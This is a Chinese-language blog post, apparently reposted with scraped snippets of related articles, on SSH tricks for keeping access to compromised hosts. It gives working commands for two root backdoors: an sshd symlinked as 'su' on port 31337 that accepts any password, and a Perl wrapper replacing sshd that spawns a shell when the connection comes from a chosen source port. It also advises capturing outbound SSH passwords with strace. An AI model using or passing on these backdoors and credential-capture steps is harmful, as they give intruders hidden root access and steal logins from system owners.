滲透技巧之SSH篇

2021-09-11 11:23:58 字數 1261 閱讀 9649

mickey · 2014/05/12 13:57

用些小技巧,濛濛菜鳥管理員。

肉雞上執行

#!bash

[email protected]:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=31337;

複製**

就會派生乙個31337埠,然後連線31337,用root/bin/ftp/mail當使用者名稱,密碼隨意,就可登陸。

效果圖:

在肉雞上執行:

#!bash

[[email protected] ~]# cd /usr/sbin

[[email protected] sbin]# mv sshd ../bin

[[email protected] sbin]# echo '#!/usr/bin/perl' >sshd

[[email protected] sbin]# echo 'exec "/bin/sh" if (getpeername(stdin) =~ /^..4a/);' >>sshd

[[email protected] sbin]# echo 'exec "/usr/sbin/sshd",@ar**,' >>sshd

[[email protected] sbin]# chmod u+x sshd

[[email protected] sbin]# /etc/init.d/sshd restart

複製**

在本機執行:

#!bash

socat stdio tcp4:10.18.180.20:22,sourceport=13377

複製**

如果你想修改源埠,可以用python的struct標準庫實現

#!python

>>> import struct

>>> buffer = struct.pack('>i6',19526)

>>> print repr(buffer)

'\x00\x00lf'

>>> buffer = struct.pack('>i6',13377)

>>> print buffer

4a複製**

效果圖如下:

搞定主機後,往往想記錄肉雞ssh連線到其他主機的密碼,進一步擴大戰果,使用strace命令就行了。

效果圖:

滲透技巧之ssh

肉雞上執行 mickey vic ln sf usr sbin sshd tmp su tmp su oport 31337 就會派生乙個31337埠,然後連線31337,用root bin ftp mail當使用者名稱,密碼隨意,就可登陸。效果圖 在肉雞上執行 root localhost cd ...

滲透測試 SSH

安全shell ssh 服務提供了對unix和windows系統的加密訪問,通過ssh可以進行命令列shell訪問 檔案訪問與安全ftp 以及簡單的vpn服務。由於使用明文的服務 如telnet 存在的弱點經常會被攻擊者利用來突破網路,所以ssh應運而生,主要用於實現對伺服器的加密訪問,以達到安全地...

滲透測試之漏洞驗證篇

msf 是乙個滲透測試利用框架,在這個框架中整合了很多漏洞檢測和利用的指令碼工具,可以讓我們直接利用,省去了在網路中查詢指令碼的時間。msf 資料庫為 postgresql,在使用時要保證其是開啟的 確定使用的指令碼工具,可以通過search來搜尋 使用對應的指令碼,use 搜尋序號 或use 指令...